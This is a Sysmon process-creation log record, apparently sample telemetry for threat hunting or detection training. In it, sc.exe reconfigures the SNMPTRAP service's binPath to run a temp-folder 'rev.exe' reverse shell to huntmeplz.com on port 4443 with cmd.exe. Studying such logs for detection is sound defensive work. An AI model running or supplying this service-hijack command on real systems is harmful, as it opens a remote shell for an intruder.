Field: 	Value
CommandLine:	sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"
Company:	Microsoft Corporation
CurrentDirectory:	C:\Users\victim\Downloads\
Description:	Service Control Manager Configuration Tool
EventID:1
FileVersion:	10.0.17763.1 (WinBuild.160101.0800)
Hashes:	MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
Image:	C:\Windows\System32\sc.exe
IntegrityLevel:	Medium
LogonGuid:	{4bbef3ae-81e4-630c-b94b-100000000000}
LogonId:	0x104bb9
OriginalFileName:	sc.exe
ParentCommandLine:	cmd.exe
ParentImage:	C:\Windows\System32\cmd.exe
ParentProcessGuid:	{4bbef3ae-cbcf-630c-070f-000000000e00}
ParentProcessId:	1856
ParentUser:	User\victim
ProcessGuid:	{4bbef3ae-cc04-630c-0b10-000000000e00}
ProcessId:	1208
Product:	Microsoft® Windows® Operating System
RuleName:	-
TerminalSessionId:	2
User:	User\victim
UtcTime:	2022-08-29 14:24:04.377
